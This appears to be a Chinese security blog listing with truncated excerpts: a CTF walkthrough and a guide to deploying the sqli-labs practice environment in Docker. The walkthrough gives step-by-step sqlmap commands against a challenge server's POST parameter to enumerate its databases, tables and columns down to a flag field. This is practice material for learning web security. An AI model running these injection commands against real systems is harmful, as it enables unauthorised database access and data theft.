关于SQLmap
关于SQLmap
还是成绩单那个例子
第一步:
sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” –dbs
tips:因为是post方式,所以构造语句时需要加data=
– dbs 爆出数据库名称
如图:可以看到全部的数据库
第二步:将数据库中的所有表爆出来
构造语句:
sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” -D skctf –tables
第三步:知道了数据库 知道了表 我们将表中的字段名爆出来
构造语句:
sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” -D skctf -T fl4g –columns
得到:
+————+————-+| Column | Type |+————+————-+| skctf_flag | varchar(64) |+————+————-+
第四步:最后一步 爆字段内容
构造语句:
sqlmap ...
sqli-labs
sqli-labs搭建以及前15题解答
[TOC]
sqli-labs的部署(vps上)
安装docker
因为自己vps上已经装好了,就不多赘述了
yum upadte//更新yum
yum install -y docker-engine //安装docker
部署sqli_libs
sudo docker search sqli-labs//在docker镜像库中搜索sqli-labs
sudo docker pull acgpiano/sqli-labs//拉取docker镜像库中的sqli-labs,并下载
sudo docker run -d --name sqli-labs -p 20000:80 acgpiano/sqli-labs//生成镜像,-p为端口号 -name为镜像名字
完成后在命令行中打入 docker ps 查看镜像,可以看到sqli-labs的端口号为20000,已经开启
打开网页可以看到已经访问成功,让我们点击 第二行的setup 连接一下数据库
如果显示如下的画面则表示已经部署完毕,可以做题啦!
ps: 如果无法连接securit ...
